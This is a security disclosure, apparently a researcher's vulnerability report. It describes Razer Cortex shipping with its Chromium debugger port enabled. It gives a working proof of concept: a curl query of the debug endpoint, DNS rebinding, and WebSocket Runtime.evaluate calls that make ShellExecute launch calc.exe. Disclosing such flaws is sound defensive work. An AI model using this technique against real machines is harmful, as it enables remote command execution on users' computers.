Razer "Cortex" has CEF debugger stub enabled by default allowing arbitrary remote command execution. 




I was alerted on twitter that the software distributed by Razer for their gaming equipment might be unsafe, I downloaded the ones I could see online to take a look.

I have only looked at "Cortex", apparently some kind of system optimizer (frankly, the claims it makes seem dubious).

Cortex is a CEF (Chromium Embedded) application, and unbelievably they left the debugger running and enabled by default in production builds.


$ curl -si localhost:8088/json/list
HTTP/1.1 200 OK
Content-Length:2094
Content-Type:application/json; charset=UTF-8

[ {
   "description": "",
   "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:8088/devtools/page/(A6E5587C41694A59DB4142D98362B4CA)",
   "id": "(A6E5587C41694A59DB4142D98362B4CA)",
   "title": "Razer Game Deals - The best game deals on the web",
   "type": "page",
   "url": "<a href="https://deals.razer.com/?From=cortex&Userid=..." title="" class="" rel="nofollow">https://deals.razer.com/?From=cortex&Userid=...</a>",
   "webSocketDebuggerUrl": "ws://localhost:8088/devtools/page/(A6E5587C41694A59DB4142D98362B4CA)"
} ]


That is obviously exploitable, but the mechanics are pretty tricky.

Razer ship a module called RazerCortex.Modules.Deals.JsInteractions in RazerCortex.Modules.Deals.dll that contains a method JSOutBrowser.open(), that is passed directly to ShellExecute(), so you can use it for command execution.

1. Read the list of pages using DNS rebinding from <a href="http://localhost:8088/json/list" title="" class="" rel="nofollow">http://localhost:8088/json/list</a>
2. Open a WebSocket to the webSocketDebuggerUrl listed.

Do something like:

x = new WebSocket("ws://localhost:8088/devtools/page/(EBC04DF125124EC6E07D8CEA8A0470E8)")

x.send(JSON.stringify({"id":1,"method":"Runtime.enable"})) // Enable javascript evaluation
x.send(JSON.stringify({"id":2,"method":"Runtime.evaluate","params":{"expression":"RazerCortexOutBrowser.open(JSON.stringify({url: \"c:\\\\windows\\\\system32\\\\calc.exe\"}))"}})) // Run arbitrary commands.



This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.




Found by: taviso